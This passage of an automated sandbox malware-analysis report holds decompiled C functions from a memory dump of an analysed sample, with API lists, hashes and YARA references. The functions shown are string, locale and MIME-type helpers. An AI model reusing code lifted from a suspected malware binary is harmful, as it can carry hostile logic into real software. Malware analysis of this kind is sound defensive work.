					if(_v256 >= 0x10) {
						_t84 = _v276;
						_push(_v276);
						E29DADF3B();
						_t98 = _t98 + 4;
					}
					_v8 = 0;
					_v256 = 0xf;
					_v260 = 0;
					_v276 = 0;
					if(_v228 >= 8) {
						_push(_v248);
						E29DADF3B();
						_t98 = _t98 + 4;
					}
					_t92 = _v280;
					 *((intOrPtr*)(_t92 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t92 + 0x10)) = 0;
					 *_t92 = 0;
					E29D891D0( &_v220, _t92);
					if(_v200 >= 0x10) {
						_push(_v220);
						goto L11;
					}
				} else {
					 *((intOrPtr*)(_t92 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t92 + 0x10)) = 0;
					 *_t92 = 0;
					E29D892C0(_t92, "Unknown", 7);
					if(_v200 >= 0x10) {
						_push(_v220);
						L11:
						E29DADF3B();
					}
				}
				 *[fs:0x0] = _v16;
				_pop(_t90);
				_pop(_t94);
				_pop(_t72);
				return E29DADF46(_t92, _t72, _v20 ^ _t95, _t84, _t90, _t94);
			}


































                                        0x29da3733
                                        0x29da3735
                                        0x29da3740
                                        0x29da3747
                                        0x29da374c
                                        0x29da374e
                                        0x29da3754
                                        0x29da3758
                                        0x29da3760
                                        0x29da3767
                                        0x29da376d
                                        0x29da3773
                                        0x29da3779
                                        0x29da377f
                                        0x29da3793
                                        0x29da3797
                                        0x29da379e
                                        0x29da37a3
                                        0x29da37a6
                                        0x29da37a8
                                        0x29da37ae
                                        0x29da37b7
                                        0x29da37ea
                                        0x29da37f0
                                        0x29da37fa
                                        0x29da3800
                                        0x29da3807
                                        0x29da3810
                                        0x29da3810
                                        0x29da3813
                                        0x29da3816
                                        0x29da382c
                                        0x29da383d
                                        0x29da3841
                                        0x29da384e
                                        0x29da3852
                                        0x29da385e
                                        0x29da3860
                                        0x29da3866
                                        0x29da3867
                                        0x29da386c
                                        0x29da386c
                                        0x29da3876
                                        0x29da3880
                                        0x29da3886
                                        0x29da388c
                                        0x29da3892
                                        0x29da389a
                                        0x29da389b
                                        0x29da38a0
                                        0x29da38a0
                                        0x29da38a3
                                        0x29da38a9
                                        0x29da38ac
                                        0x29da38b5
                                        0x29da38b7
                                        0x29da38c3
                                        0x29da38cb
                                        0x00000000
                                        0x29da38cb
                                        0x29da37b9
                                        0x29da37bb
                                        0x29da37be
                                        0x29da37c8
                                        0x29da37ca
                                        0x29da37d6
                                        0x29da37e2
                                        0x29da38cc
                                        0x29da38cc
                                        0x29da38d1
                                        0x29da37d6
                                        0x29da38d9
                                        0x29da38e1
                                        0x29da38e2
                                        0x29da38e3
                                        0x29da38f1

                                        APIs
                                        • _memset.LIBCMT ref: 29DA379E
                                        • GetUserDefaultLocaleName.KERNEL32(?,00000055,00000010,0000000F,00000000), ref: 29DA37AF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DefaultLocaleNameUser_memset
                                        • String ID: Unknown
                                        • API String ID: 3917531957-1654365787
                                        • Opcode ID: 6dde62febb3fd4652edf26438b0446607607ef924566ffc4af57f974bac80bee
                                        • Instruction ID: 9e2892e1713c67abccc623d6d873e21fe95a12f13a8c8a87c404774649df676c
                                        • Opcode Fuzzy Hash: 6dde62febb3fd4652edf26438b0446607607ef924566ffc4af57f974bac80bee
                                        • Instruction Fuzzy Hash: 6D419AB1D00259ABDB24CF68CC81BDAF7B5BF14700F0085EED509A7A40EB746A89DF61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D892C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29D892C0(intOrPtr* __ecx, intOrPtr _a4, signed int _a8) {
				intOrPtr _t15;
				intOrPtr* _t16;
				char* _t22;
				intOrPtr* _t27;
				intOrPtr* _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				signed int _t47;
				intOrPtr* _t52;

				_t33 = _a4;
				_t52 = __ecx;
				if(_t33 == 0) {
					L12:
					_t47 = _a8;
					if(_t47 > 0xfffffffe) {
						E29DAD440("string too long");
					}
					_t15 =  *((intOrPtr*)(_t52 + 0x14));
					if(_t15 >= _t47) {
						if(_t47 != 0) {
							goto L16;
						} else {
							 *((intOrPtr*)(_t52 + 0x10)) = _t47;
							if(_t15 < 0x10) {
								_t22 = _t52;
								 *_t22 = 0;
								return _t22;
							} else {
								 *((char*)( *_t52)) = 0;
								return _t52;
							}
						}
					} else {
						E29D89750(_t52, _t47,  *((intOrPtr*)(_t52 + 0x10)));
						if(_t47 == 0) {
							L26:
							return _t52;
						} else {
							L16:
							if( *((intOrPtr*)(_t52 + 0x14)) < 0x10) {
								_t16 = _t52;
							} else {
								_t16 =  *_t52;
							}
							E29DB0010(_t16, _t33, _t47);
							 *((intOrPtr*)(_t52 + 0x10)) = _t47;
							if( *((intOrPtr*)(_t52 + 0x14)) < 0x10) {
								 *((char*)(_t52 + _t47)) = 0;
								goto L26;
							} else {
								 *((char*)( *_t52 + _t47)) = 0;
								return _t52;
							}
						}
					}
				} else {
					_t38 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t38 < 0x10) {
						_t27 = __ecx;
					} else {
						_t27 =  *__ecx;
					}
					if(_t33 < _t27) {
						goto L12;
					} else {
						if(_t38 < 0x10) {
							_t28 = _t52;
						} else {
							_t28 =  *_t52;
						}
						if( *((intOrPtr*)(_t52 + 0x10)) + _t28 <= _t33) {
							goto L12;
						} else {
							if(_t38 < 0x10) {
								return E29D894C0(_t52, _t52, _t33 - _t52, _a8);
							} else {
								return E29D894C0(_t52, _t52, _t33 -  *_t52, _a8);
							}
						}
					}
				}
			}












                                        0x29d892c4
                                        0x29d892c8
                                        0x29d892cc
                                        0x29d89327
                                        0x29d89328
                                        0x29d8932e
                                        0x29d89335
                                        0x29d89335
                                        0x29d8933a
                                        0x29d8933f
                                        0x29d8935d
                                        0x00000000
                                        0x29d8935f
                                        0x29d8935f
                                        0x29d89365
                                        0x29d89376
                                        0x29d89379
                                        0x29d8937e
                                        0x29d89367
                                        0x29d8936a
                                        0x29d89372
                                        0x29d89372
                                        0x29d89365
                                        0x29d89341
                                        0x29d89348
                                        0x29d8934f
                                        0x29d893ac
                                        0x29d893b2
                                        0x29d89351
                                        0x29d89351
                                        0x29d89355
                                        0x29d89381
                                        0x29d89357
                                        0x29d89357
                                        0x29d89357
                                        0x29d89386
                                        0x29d89392
                                        0x29d89395
                                        0x29d893a8
                                        0x00000000
                                        0x29d89397
                                        0x29d89399
                                        0x29d893a3
                                        0x29d893a3
                                        0x29d89395
                                        0x29d8934f
                                        0x29d892ce
                                        0x29d892ce
                                        0x29d892d4
                                        0x29d892da
                                        0x29d892d6
                                        0x29d892d6
                                        0x29d892d6
                                        0x29d892de
                                        0x00000000
                                        0x29d892e0
                                        0x29d892e3
                                        0x29d892e9
                                        0x29d892e5
                                        0x29d892e5
                                        0x29d892e5
                                        0x29d892f2
                                        0x00000000
                                        0x29d892f4
                                        0x29d892f7
                                        0x29d89324
                                        0x29d892f9
                                        0x29d8930d
                                        0x29d8930d
                                        0x29d892f7
                                        0x29d892f2
                                        0x29d892de

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D89335
                                        • _memmove.LIBCMT ref: 29D89386
                                          • Part of subcall function 29D894C0: std::_Xinvalid_argument.LIBCPMT ref: 29D894DA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                        • String ID: string too long
                                        • API String ID: 2168136238-2556327735
                                        • Opcode ID: 4c16fbf3884959d19bc1cfb1224ad00c706f4b451073f32c6406b1ad871f46e4
                                        • Instruction ID: 1f42ae3f307a83693896b49c2630921dd4bddaee28b7096fcaf2d76b3e593362
                                        • Opcode Fuzzy Hash: 4c16fbf3884959d19bc1cfb1224ad00c706f4b451073f32c6406b1ad871f46e4
                                        • Instruction Fuzzy Hash: 6931A4323106149FD3249EDCE88495EF7EDFFA5664B60462FE5C6C7A82C761E84393A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D95660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 90%
                                        			E29D95660(signed int _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				void* __ecx;
				void* __edi;
				signed int _t35;
				void* _t39;
				intOrPtr* _t40;
				signed int _t41;
				signed int _t42;
				signed int _t53;
				char _t56;
				signed int _t57;
				signed int _t64;
				signed int _t66;
				signed int _t68;
				signed int _t70;
				intOrPtr _t71;

				_push(0xffffffff);
				_push(E29DC2260);
				_push( *[fs:0x0]);
				_push(_t57);
				_t35 =  *0x29dd5664; // 0xd9555f04
				_push(_t35 ^ _t70);
				 *[fs:0x0] =  &_v16;
				_v20 = _t71;
				_t68 = _a4;
				_t39 = _a12 - _a8;
				_t64 =  *(_t68 + 0x10);
				if(_t64 <= _t39 &&  *(_t68 + 0x14) != _t39) {
					_t57 = _t68;
					if(E29D895B0(_t57, _t64, _t39, 1) != 0) {
						 *(_t68 + 0x10) = _t64;
						if( *(_t68 + 0x14) < 0x10) {
							_t53 = _t68;
						} else {
							_t53 =  *_t68;
						}
						 *((char*)(_t53 + _t64)) = 0;
					}
				}
				_v8 = 0;
				_t40 = _a8;
				while(_t40 != _a12) {
					_t56 =  *_t40;
					_t41 =  *(_t68 + 0x10);
					if((_t57 | 0xffffffff) - _t41 <= 1) {
						_t41 = E29DAD440("string too long");
					}
					_t15 = _t41 + 1; // 0x1
					_t66 = _t15;
					if(_t66 > 0xfffffffe) {
						_t41 = E29DAD440("string too long");
					}
					_t57 =  *(_t68 + 0x14);
					if(_t57 >= _t66) {
						if(_t66 != 0) {
							goto L15;
						}
						 *(_t68 + 0x10) = _t66;
						if(_t57 < 0x10) {
							 *_t68 = 0;
							_t40 = _a8 + 1;
							_a8 = _t40;
						} else {
							 *( *_t68) = 0;
							_t40 = _a8 + 1;
							_a8 = _t40;
						}
						continue;
					} else {
						_t57 = _t68;
						E29D89750(_t57, _t66, _t41);
						if(_t66 == 0) {
							L25:
							_t40 = _a8 + 1;
							_a8 = _t40;
							continue;
						}
						L15:
						_t57 =  *(_t68 + 0x10);
						if( *(_t68 + 0x14) < 0x10) {
							_t42 = _t68;
						} else {
							_t42 =  *_t68;
						}
						 *((char*)(_t42 + _t57)) = _t56;
						 *(_t68 + 0x10) = _t66;
						if( *(_t68 + 0x14) < 0x10) {
							 *((char*)(_t68 + _t66)) = 0;
							goto L25;
						} else {
							 *((char*)( *_t68 + _t66)) = 0;
							_t40 = _a8 + 1;
							_a8 = _t40;
							continue;
						}
					}
				}
				 *[fs:0x0] = _v16;
				return _t40;
			}





















                                        0x29d95663
                                        0x29d95665
                                        0x29d95670
                                        0x29d95671
                                        0x29d95675
                                        0x29d9567c
                                        0x29d95680
                                        0x29d95686
                                        0x29d95689
                                        0x29d9568f
                                        0x29d95692
                                        0x29d95697
                                        0x29d956a1
                                        0x29d956aa
                                        0x29d956b0
                                        0x29d956b3
                                        0x29d956b9
                                        0x29d956b5
                                        0x29d956b5
                                        0x29d956b5
                                        0x29d956bb
                                        0x29d956bb
                                        0x29d956aa
                                        0x29d956bf
                                        0x29d956c6
                                        0x29d956d0
                                        0x29d956d9
                                        0x29d956db
                                        0x29d956e6
                                        0x29d956ed
                                        0x29d956ed
                                        0x29d956f2
                                        0x29d956f2
                                        0x29d956f8
                                        0x29d956ff
                                        0x29d956ff
                                        0x29d95704
                                        0x29d95709
                                        0x29d9575d
                                        0x00000000
                                        0x00000000
                                        0x29d9575f
                                        0x29d95765
                                        0x29d9577a
                                        0x29d95780
                                        0x29d95781
                                        0x29d95767
                                        0x29d95769
                                        0x29d9576f
                                        0x29d95770
                                        0x29d95770
                                        0x00000000
                                        0x29d9570b
                                        0x29d9570d
                                        0x29d9570f
                                        0x29d95716
                                        0x29d957ae
                                        0x29d957b1
                                        0x29d957b2
                                        0x00000000
                                        0x29d957b2
                                        0x29d9571c
                                        0x29d9571c
                                        0x29d95727
                                        0x29d95789
                                        0x29d95729
                                        0x29d95729
                                        0x29d95729
                                        0x29d9578b
                                        0x29d9578e
                                        0x29d95794
                                        0x29d957aa
                                        0x00000000
                                        0x29d95796
                                        0x29d95798
                                        0x29d9579f
                                        0x29d957a0
                                        0x00000000
                                        0x29d957a0
                                        0x29d95794
                                        0x29d95709
                                        0x29d957bd
                                        0x29d957cb

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D956ED
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D956FF
                                          • Part of subcall function 29D895B0: std::_Xinvalid_argument.LIBCPMT ref: 29D895C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_
                                        • String ID: string too long
                                        • API String ID: 909987262-2556327735
                                        • Opcode ID: c7a2c5184312fd5aaabadd37fc987ceead0ad253f504847705b504bb6948cbcc
                                        • Instruction ID: adebe816fdd2d334e1c4cc9f37ff51f8172b43ef50a6c01acfe08edd209a10ad
                                        • Opcode Fuzzy Hash: c7a2c5184312fd5aaabadd37fc987ceead0ad253f504847705b504bb6948cbcc
                                        • Instruction Fuzzy Hash: 2641C334614644DFD725DF18C880B5AB7F9FF55760F108A6DEC968BB40DB70AA02DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA80E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 70%
                                        			E29DA80E0(char __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				char* _t26;
				char* _t28;
				char* _t30;
				void* _t35;
				void* _t38;
				void* _t39;
				void* _t40;
				char* _t42;
				char* _t43;
				char* _t44;
				void* _t51;
				intOrPtr* _t52;
				intOrPtr* _t53;
				char* _t54;
				intOrPtr* _t55;
				intOrPtr _t58;
				signed int _t60;
				void* _t61;
				void* _t66;

				_t48 = __edx;
				_push(0xffffffff);
				_push(E29DC1B90);
				_push( *[fs:0x0]);
				_push(_t51);
				_t20 =  *0x29dd5664; // 0xd9555f04
				_push(_t20 ^ _t60);
				 *[fs:0x0] =  &_v16;
				_v20 = _t61 - 8;
				_t58 = _a4;
				_v24 = E29DAFCBE(_t51, _t58, _t66);
				 *((intOrPtr*)(_t58 + 8)) = 0;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				 *((intOrPtr*)(_t58 + 0x14)) = 0;
				_v8 = 0;
				_t52 = 0x29dcd617;
				E29DADE30();
				_t38 = 1;
				_t26 = E29DAD4FB(1, _t48, 0x29dcd617, _t58, 0, 1);
				_t42 = _t26;
				while(_t38 != 0) {
					_t48 =  *_t52;
					 *_t42 =  *_t52;
					_t38 = _t38 - 1;
					_t42 = _t42 + 1;
					_t52 = _t52 + 1;
				}
				 *((intOrPtr*)(_t58 + 8)) = _t26;
				E29DADE30();
				_t39 = 6;
				_t53 = "false";
				_t28 = E29DAD4FB(6, _t48, _t53, _t58, __eflags, 6);
				_t43 = _t28;
				while(1) {
					__eflags = _t39;
					if(__eflags == 0) {
						break;
					}
					_t48 =  *_t53;
					 *_t43 =  *_t53;
					_t39 = _t39 - 1;
					_t43 = _t43 + 1;
					_t53 = _t53 + 1;
				}
				 *((intOrPtr*)(_t58 + 0x10)) = _t28;
				E29DADE30();
				_t40 = 5;
				_t54 = "true";
				_t30 = E29DAD4FB(5, _t48, _t54, _t58, __eflags, 5);
				_t44 = _t30;
				while(1) {
					__eflags = _t40;
					if(_t40 == 0) {
						break;
					}
					 *_t44 =  *_t54;
					_t40 = _t40 - 1;
					_t44 = _t44 + 1;
					_t54 =  &(_t54[1]);
				}
				 *((intOrPtr*)(_t58 + 0x14)) = _t30;
				E29DADE30();
				_t55 = _v24;
				 *((char*)(_t58 + 0xc)) =  *((intOrPtr*)( *_t55));
				E29DADE30();
				 *((char*)(_t58 + 0xd)) =  *((intOrPtr*)( *((intOrPtr*)(_t55 + 4))));
				_t35 = 1;
				__eflags = 1;
				if(1 != 0) {
					E29DADE30();
					 *((char*)(_t58 + 0xc)) = 0x2e;
					_t35 = E29DADE30();
					 *((char*)(_t58 + 0xd)) = 0x2c;
				}
				 *[fs:0x0] = _v16;
				return _t35;
			}






























                                        0x29da80e0
                                        0x29da80e3
                                        0x29da80e5
                                        0x29da80f0
                                        0x29da80f6
                                        0x29da80f7
                                        0x29da80fe
                                        0x29da8102
                                        0x29da8108
                                        0x29da810b
                                        0x29da8113
                                        0x29da8118
                                        0x29da811b
                                        0x29da811e
                                        0x29da8121
                                        0x29da8124
                                        0x29da8129
                                        0x29da812e
                                        0x29da8134
                                        0x29da813c
                                        0x29da8140
                                        0x29da8144
                                        0x29da8146
                                        0x29da8148
                                        0x29da8149
                                        0x29da814a
                                        0x29da814a
                                        0x29da814d
                                        0x29da8150
                                        0x29da8155
                                        0x29da815b
                                        0x29da8160
                                        0x29da8168
                                        0x29da8170
                                        0x29da8170
                                        0x29da8172
                                        0x00000000
                                        0x00000000
                                        0x29da8174
                                        0x29da8176
                                        0x29da8178
                                        0x29da8179
                                        0x29da817a
                                        0x29da817a
                                        0x29da817d
                                        0x29da8180
                                        0x29da8185
                                        0x29da818b
                                        0x29da8190
                                        0x29da8198
                                        0x29da81a0
                                        0x29da81a0
                                        0x29da81a2
                                        0x00000000
                                        0x00000000
                                        0x29da81a6
                                        0x29da81a8
                                        0x29da81a9
                                        0x29da81aa
                                        0x29da81aa
                                        0x29da81ad
                                        0x29da81b0
                                        0x29da81b5
                                        0x29da81bc
                                        0x29da81bf
                                        0x29da81c9
                                        0x29da81cc
                                        0x29da81ce
                                        0x29da81d0
                                        0x29da81d2
                                        0x29da81d7
                                        0x29da81db
                                        0x29da81e0
                                        0x29da81e0
                                        0x29da81e7
                                        0x29da81f5

                                        APIs
                                        • _localeconv.LIBCMT ref: 29DA810E
                                          • Part of subcall function 29DAFCBE: __getptd.LIBCMT ref: 29DAFCBE
                                          • Part of subcall function 29DADE30: ____lc_handle_func.LIBCMT ref: 29DADE33
                                          • Part of subcall function 29DADE30: ____lc_codepage_func.LIBCMT ref: 29DADE3B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ____lc_codepage_func____lc_handle_func__getptd_localeconv
                                        • String ID: false$true
                                        • API String ID: 679402580-2658103896
                                        • Opcode ID: 48cca7bda926c1f58a0247c360ef73e305d8619a6269581f49a0bcbe95692f09
                                        • Instruction ID: 0581e302e2363b8373f3d2203ef7861d220336006459016614751166db65c8f0
                                        • Opcode Fuzzy Hash: 48cca7bda926c1f58a0247c360ef73e305d8619a6269581f49a0bcbe95692f09
                                        • Instruction Fuzzy Hash: 713122B19447809FC711CF748480767BBE9EF3A280F14997DC9968BB01EA34A6179BF1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA4FF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                        Download Yara Rule
                                        APIs
                                        • _malloc.LIBCMT ref: 29DA5020
                                        • StrCmpCW.SHLWAPI(00000000,image/jpeg), ref: 29DA504A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _malloc
                                        • String ID: image/jpeg
                                        • API String ID: 1579825452-3785015651
                                        • Opcode ID: 565427cab4eedab358a7806150547dcb6c60dfad971382295179cdf08c8687eb
                                        • Instruction ID: 286dbc9227377c1c1e1ea2f609b59e4ec4ec0e82f5d15b7d04e725495c5bee84
                                        • Opcode Fuzzy Hash: 565427cab4eedab358a7806150547dcb6c60dfad971382295179cdf08c8687eb
                                        • Instruction Fuzzy Hash: 30118472A01118AB8710DF9CD98489EBBB9EF89760720C29BE80CDB241D731DA52DBD5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D97940 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29D97940(intOrPtr* __edi, intOrPtr* _a4, signed int _a8) {
				void* __esi;
				signed int _t16;
				intOrPtr* _t21;
				signed int _t31;
				void* _t32;
				intOrPtr* _t33;
				intOrPtr* _t34;
				intOrPtr* _t41;
				intOrPtr _t42;
				signed int _t43;

				_t41 = __edi;
				_t33 = _a4;
				_t31 = _a8;
				_t42 =  *((intOrPtr*)(_t33 + 0x10));
				if(_t42 < _t31) {
					_t16 = E29DAD48D("invalid string position");
				}
				_t43 = _t42 - _t31;
				if(_t16 < _t43) {
					_t43 = _t16;
				}
				if(_t41 != _t33) {
					if(E29D97A70(_t43) == 0) {
						L15:
						return _t41;
					} else {
						_t34 = _a4;
						if( *((intOrPtr*)(_t34 + 0x14)) >= 8) {
							_t34 =  *_t34;
						}
						if( *((intOrPtr*)(_t41 + 0x14)) < 8) {
							_t21 = _t41;
						} else {
							_t21 =  *_t41;
						}
						_t32 = _t43 + _t43;
						E29DB0010(_t21, _t34 + _a8 * 2, _t32);
						 *(_t41 + 0x10) = _t43;
						if( *((intOrPtr*)(_t41 + 0x14)) < 8) {
							 *((short*)(_t32 + _t41)) = 0;
							goto L15;
						} else {
							 *((short*)(_t32 +  *_t41)) = 0;
							return _t41;
						}
					}
				} else {
					E29D979F0(_t16 | 0xffffffff, _t43 + _t31, _t41);
					E29D979F0(_t31, 0, _t41);
					return _t41;
				}
			}













                                        0x29d97940
                                        0x29d97943
                                        0x29d97947
                                        0x29d9794b
                                        0x29d97950
                                        0x29d97957
                                        0x29d97957
                                        0x29d9795c
                                        0x29d97960
                                        0x29d97962
                                        0x29d97962
                                        0x29d97966
                                        0x29d9798f
                                        0x29d979e1
                                        0x29d979e5
                                        0x29d97991
                                        0x29d97991
                                        0x29d9799c
                                        0x29d9799e
                                        0x29d9799e
                                        0x29d979a3
                                        0x29d979a9
                                        0x29d979a5
                                        0x29d979a5
                                        0x29d979a5
                                        0x29d979ae
                                        0x29d979b7
                                        0x29d979c3
                                        0x29d979c6
                                        0x29d979dc
                                        0x00000000
                                        0x29d979c8
                                        0x29d979cc
                                        0x29d979d5
                                        0x29d979d5
                                        0x29d979c6
                                        0x29d97968
                                        0x29d97970
                                        0x29d97979
                                        0x29d97983
                                        0x29d97983

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D97957
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4A2
                                          • Part of subcall function 29DAD48D: __CxxThrowException@8.LIBCMT ref: 29DAD4B7
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4C8
                                          • Part of subcall function 29D97A70: std::_Xinvalid_argument.LIBCPMT ref: 29D97A7D
                                        • _memmove.LIBCMT ref: 29D979B7
                                        Strings
                                        • invalid string position, xrefs: 29D97952
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                        • String ID: invalid string position
                                        • API String ID: 3404309857-1799206989
                                        • Opcode ID: 95d9bcc4f99873c4d6a29a667f2b6f5ffbd599843b5ab1ab135c99e66b3c1a34
                                        • Instruction ID: 90835c10c62302ea70604797040317e1ac60d78d9af2dc7d1e0b561949b1c12e
                                        • Opcode Fuzzy Hash: 95d9bcc4f99873c4d6a29a667f2b6f5ffbd599843b5ab1ab135c99e66b3c1a34
                                        • Instruction Fuzzy Hash: 3E112932731211ABD704EF6CE8808A9B36AFFD42247504A2FE449DBA41D731ED56D7B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D896C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29D896C0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr _t16;
				intOrPtr* _t19;
				intOrPtr _t24;
				intOrPtr _t27;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t34;

				_t34 = __ecx;
				_t10 =  *((intOrPtr*)(__ecx + 0x10));
				_t24 = _a4;
				if(_t10 < _t24) {
					_t10 = E29DAD48D("invalid string position");
				}
				_t31 = _a8;
				_t11 = _t10 - _t24;
				if(_t11 < _t31) {
					_t31 = _t11;
				}
				if(_t31 == 0) {
					L14:
					return _t34;
				} else {
					_t27 =  *((intOrPtr*)(_t34 + 0x14));
					if(_t27 < 0x10) {
						_t19 = _t34;
					} else {
						_t19 =  *_t34;
					}
					if(_t27 < 0x10) {
						_t28 = _t34;
					} else {
						_t28 =  *_t34;
					}
					E29DAE1F0(_t28 + _t24, _t19 + _t24 + _t31, _t11 - _t31);
					_t16 =  *((intOrPtr*)(_t34 + 0x10)) - _t31;
					 *((intOrPtr*)(_t34 + 0x10)) = _t16;
					if( *((intOrPtr*)(_t34 + 0x14)) < 0x10) {
						 *((char*)(_t34 + _t16)) = 0;
						goto L14;
					} else {
						 *((char*)( *_t34 + _t16)) = 0;
						return _t34;
					}
				}
			}












                                        0x29d896c4
                                        0x29d896c6
                                        0x29d896c9
                                        0x29d896cf
                                        0x29d896d6
                                        0x29d896d6
                                        0x29d896db
                                        0x29d896de
                                        0x29d896e2
                                        0x29d896e4
                                        0x29d896e4
                                        0x29d896e8
                                        0x29d8973a
                                        0x29d8973f
                                        0x29d896ea
                                        0x29d896ea
                                        0x29d896f1
                                        0x29d896f7
                                        0x29d896f3
                                        0x29d896f3
                                        0x29d896f3
                                        0x29d896fc
                                        0x29d89702
                                        0x29d896fe
                                        0x29d896fe
                                        0x29d896fe
                                        0x29d8970f
                                        0x29d8971a
                                        0x29d89720
                                        0x29d89724
                                        0x29d89736
                                        0x00000000
                                        0x29d89726
                                        0x29d89728
                                        0x29d89731
                                        0x29d89731
                                        0x29d89724

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D896D6
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4A2
                                          • Part of subcall function 29DAD48D: __CxxThrowException@8.LIBCMT ref: 29DAD4B7
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4C8
                                        • _memmove.LIBCMT ref: 29D8970F
                                        Strings
                                        • invalid string position, xrefs: 29D896D1
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                        • String ID: invalid string position
                                        • API String ID: 1785806476-1799206989
                                        • Opcode ID: 4c4b6232c3be97f65a646c7bdd41f99ad805dee30e9211ef8ee61f56fd2ebbad
                                        • Instruction ID: e0e7784fdba8dc570704990c5d3529030129aa6a70bf8490d907b445f9ab669f
                                        • Opcode Fuzzy Hash: 4c4b6232c3be97f65a646c7bdd41f99ad805dee30e9211ef8ee61f56fd2ebbad
                                        • Instruction Fuzzy Hash: 5501F9763102505BC3258E6CEC8595AB3EAFFD0690B24492ED1C1CBF06D6B1EC43E3A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA08E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29DA08E0(signed int __eax, char __ebx, intOrPtr* __esi) {
				intOrPtr _t15;
				intOrPtr* _t16;
				char* _t21;
				char _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				signed int _t33;
				intOrPtr* _t38;

				_t38 = __esi;
				_t27 = __ebx;
				_t28 =  *((intOrPtr*)(__esi + 0x10));
				if((__eax | 0xffffffff) - _t28 <= 1) {
					E29DAD440("string too long");
				}
				_t33 = _t28 + 1;
				if(_t33 > 0xfffffffe) {
					E29DAD440("string too long");
				}
				_t15 =  *((intOrPtr*)(_t38 + 0x14));
				if(_t15 >= _t33) {
